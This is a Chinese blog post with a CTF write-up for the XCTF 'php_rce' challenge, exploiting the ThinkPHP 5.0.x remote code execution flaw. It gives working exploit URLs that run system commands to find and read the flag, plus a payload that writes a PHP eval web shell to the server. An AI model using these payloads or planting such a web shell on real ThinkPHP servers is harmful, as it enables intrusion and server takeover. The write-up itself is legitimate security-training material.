攻防世界-web-php_rce(ThinkPHP 5.0命令执行漏洞)

 
更多

本题进入场景后显示如下页面

这是一个 thinkphp 框架,先查看版本号。在网址上随意输入一个不存在的模块 地址:

可以看到,thinkphp 版本为 5.0.20。

搜索发现,ThinkPHP 5.0.0-5.0.23 存在远程代码执行漏洞。

漏洞成因可参考:https://www.cnblogs.com/backlion/p/10106676.html

网上有很多现成的POC,可以直接拿来使用。

方法一:

首先,查找flag文件

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("find / -name 'flag'");'

或者

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

接着,查看flag。

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat /flag");'

或者

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

方法二:

写入一句话木马

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php highlight_file(__FILE__);@eval($_POST[sss]);?>

如果成功写入会返回文件的大小,尝试去访问该文件:

然后直接上菜刀。(连接失败,不知道为啥。。。)

 

打赏

本文固定链接: https://www.cxy163.net/archives/4845 | 绝缘体

该日志由 绝缘体.. 于 2020年09月16日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 攻防世界-web-php_rce(ThinkPHP 5.0命令执行漏洞) | 绝缘体
关键字: , , , ,

攻防世界-web-php_rce(ThinkPHP 5.0命令执行漏洞):等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter